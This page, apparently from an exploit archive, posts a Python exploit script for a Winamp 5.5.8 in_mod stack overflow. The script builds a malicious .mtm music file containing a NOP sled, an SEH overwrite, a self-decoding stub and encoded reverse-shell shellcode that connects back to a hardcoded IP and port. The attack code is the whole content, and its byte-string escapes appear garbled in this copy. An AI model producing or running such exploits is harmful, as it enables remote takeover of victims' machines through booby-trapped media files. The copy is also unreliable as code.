Home / os / win7

Winamp 5.5.8 Stack Overflow

Posted on 08 January 2011

#!/usr/bin/python
# finally got time to finish what I started...
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (SEH)
# WINDOWS XP SP3 EN Fully Patched
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC and Exploit by fdisk
# This POC was already been released here (without proper shellcode): http://www.exploit-db.com/winamp-5-58-from-dos-to-code-execution/
# We later gave up on SEH and went straight for direct EIP overwrite, yesterday I couldn't sleep and decided to finish cooking this version.
# Further References:
# http://www.exploit-db.com/winamp-exploit-part-2/
# http://www.exploit-db.com/exploits/15287/
# Special thanks to Mighty-D, Ryujin and all the Exploit-DB Dev Team.

header = "x4Dx54x4Dx10x53x70x61x63x65x54x72x61x63x6Bx28x6Bx6Fx73x6Dx6Fx73x69x73x29xE0x00x29x39x20xFFx1Fx00x40x0E"
header += "x04x0C" * 16
buffersize = 65536 * 2
nopsled = "x90" * 58211

# windows/shell_reverse_tcp LHOST=192.168.33.114 LPORT=4444 (script kiddie unfriendly)
# bad chars: x00x01x02x03x04x05x06x07x08x09x10x11x12x13x0ax0bx0cx0dx0ex0f
shellcode = ("x89xe1xdaxd7xd9x71xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4dx38x4dx59x43x30"
"x43x30x45x50x43x50x4dx59x4bx55x56x51x58x52x43"
"x54x4cx4bx50x52x50x30x4cx4bx56x32x54x4cx4cx4b"
"x51x42x54x54x43x42x51x38x54x4fx58x37x51"
"x5ax56x46x50x31x4bx4fx56x51x49x50x4ex4cx47x4c"
"x43x51x43x4cx43x32x56x4cx47x50x4fx31x58x4fx54"
"x4dx58x47x5ax42x5ax50x51x42x50x57x4cx4b"
"x51x42x54x50x4cx4bx47x32x47x4cx45x51x4ex30x4c"
"x4bx47x30x43x48x4dx55x4fx30x43x44x50x4a"
"x4ex30x50x50x4cx4bx50x48x54x58x4cx4bx56x38x47"
"x50x43x31x4ex33x4bx53x47x4cx50x49x4cx4bx50x34"
"x4cx4bx43x31x49x46x50x31x4bx4fx49x50x4e"
"x4cx49x51x58x4fx54x4dx43x31x49x57x47x48x4bx50"
"x52x55x4bx44x43x33x43x4dx4cx38x47x4bx43x4dx47"
"x54x54x35x4bx52x51x48x56x38x56x44x43x31"
"x49x43x43x56x4cx4bx54x4cx50x4bx4cx4bx50x58x45"
"x4cx45x51x58x53x4cx4bx54x44x4cx4bx45x51x58x50"
"x4dx59x50x44x56x44x51x4bx51x4bx45x31x56"
"x39x50x5ax56x31x4bx4fx4dx30x56x38x51x4fx50x5a"
"x4cx4bx54x52x5ax4bx4dx56x51x4dx52x48x47x43x50"
"x32x43x30x52x48x52x57x52x53x50x32x51x4f"
"x51x44x52x48x50x4cx54x37x47x56x54x47x4bx4fx49"
"x45x4ex58x4cx50x45x51x43x30x43x30x56x49"
"x51x44x56x30x52x48x56x49x4dx50x52x4bx43x30x4b"
"x4fx58x55x50x50x50x50x50x50x50x50x51x50x56x30"
"x51x50x56x30x52x48x4bx5ax54x4fx4bx50x4b"
"x4fx49x45x4bx39x58x47x43x58x4fx30x4fx58x47x51"
"x54x32x45x38x45x52x43x30x54x51x51x4cx4cx49x5a"
"x46x52x4ax52x30x51x46x45x38x4dx49x4ex45"
"x43x44x45x31x4bx4fx58x55x45x38x43x53x52x4dx45"
"x34x45x50x4bx39x5ax43x56x37x56x37x50x57x56x51"
"x4cx36x52x4ax50x59x51x46x5ax42x4bx4dx45"
"x36x4fx37x51x54x47x54x47x4cx45x51x43x31x4cx4d"
"x51x54x56x44x52x30x49x56x43x30x51x54x51x44x56"
"x30x50x56x50x56x47x36x50x56x50x4ex50x56"
"x51x46x56x33x56x36x52x48x52x59x58x4cx47x4fx4c"
"x46x4bx4fx58x55x4dx59x4bx50x50x4ex50x56"
"x4bx4fx56x50x43x58x45x58x4bx37x45x4dx43x50x4b"
"x4fx58x55x4fx4bx4cx30x4fx45x4ex42x56x36x52x48"
"x4ex46x4cx55x4fx4dx4dx4dx4bx4fx47x4cx43"
"x36x43x4cx45x5ax4dx50x4bx4bx4dx30x43x45x43x35"
"x4fx4bx51x57x45x43x43x42x52x4fx43x5ax45x50x51"
"x43x4bx4fx58x55x45x5a")

prepare_shellcode = "x90" * 40
prepare_shellcode += "x90x33xDB"             # xor ebx,ebx
prepare_shellcode += "x54x5B"                 # push esp - pop ebx
prepare_shellcode += "x81xEBx17xCBxFFxFF" # sub ebx,-34E9
prepare_shellcode += "x83xc3x3B"             # add ebx,3B
prepare_shellcode += "x83xEBx22"             # sub ebx,22
prepare_shellcode += "x80x2BxDA"             # sub byte ptr ds:[ebx],0da
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxDA"             # sub byte ptr ds:[ebx],0da
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x90" * 6
prepare_shellcode += "x80x2BxC2"             # sub byte ptr ds:[ebx],0c2
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxBE"             # sub byte ptr ds:[ebx],0be
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxC1"             # sub byte ptr ds:[ebx],0c1
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxBF"             # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxC8"             # sub byte ptr ds:[ebx],0c8
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxB9"             # sub byte ptr ds:[ebx],0B9
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x90" * 4
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxCA"             # sub byte ptr ds:[ebx],0CA
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxD9"             # sub byte ptr ds:[ebx],0D9
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxB7"             # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxB9"             # sub byte ptr ds:[ebx],0B9
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxC1"             # sub byte ptr ds:[ebx],0c1
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxBF"             # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "x90" * 4
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxBC"             # sub byte ptr ds:[ebx],0BC
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxD6"             # sub byte ptr ds:[ebx],0D6
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxCA"             # sub byte ptr ds:[ebx],0CA
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxDA"             # sub byte ptr ds:[ebx],0da
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxC4"             # sub byte ptr ds:[ebx],0c4
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x90" * 4
prepare_shellcode += "x80x2BxB6"             # sub byte ptr ds:[ebx],0B6
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxC4"             # sub byte ptr ds:[ebx],0c4
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxBB"             # sub byte ptr ds:[ebx],0BB
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxB7"             # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxD3"             # sub byte ptr ds:[ebx],0D3
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x90" * 6
prepare_shellcode += "x80x2BxBB"             # sub byte ptr ds:[ebx],0BB
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxD8"             # sub byte ptr ds:[ebx],0D8
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxB7"             # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxD4"             # sub byte ptr ds:[ebx],0d4
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxBC"             # sub byte ptr ds:[ebx],0BC
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxB4"             # sub byte ptr ds:[ebx],0B4
prepare_shellcode += "x90" * 6
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxBF"             # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxD5"             # sub byte ptr ds:[ebx],0D5
prepare_shellcode += "x83xc3x3F"             # add ebx,3F
prepare_shellcode += "x83xEBx16"             # sub ebx,16
prepare_shellcode += "x80x2BxCC"             # sub byte ptr ds:[ebx],0CC
prepare_shellcode += "x43"                     # inc ebx
prepare_shellcode += "x80x2BxC9"             # sub byte ptr ds:[ebx],0C9
prepare_shellcode += "x90"*305

nseh = "xebx30x90x90"
seh = "x3fx28xd1x72"     # 0x72D1283F - ppr - msacm32.drv - Windows XP SP3 EN
tail = "x41" * 120
payload = header + nopsled + tail + nseh + seh + prepare_shellcode + shellcode + "x90" * 100

file = open("sploit.mtm", "w")
file.write(payload)
file.close()

print "sploit.mtm file generated successfuly"

 

TOP

Malware :

Exploits :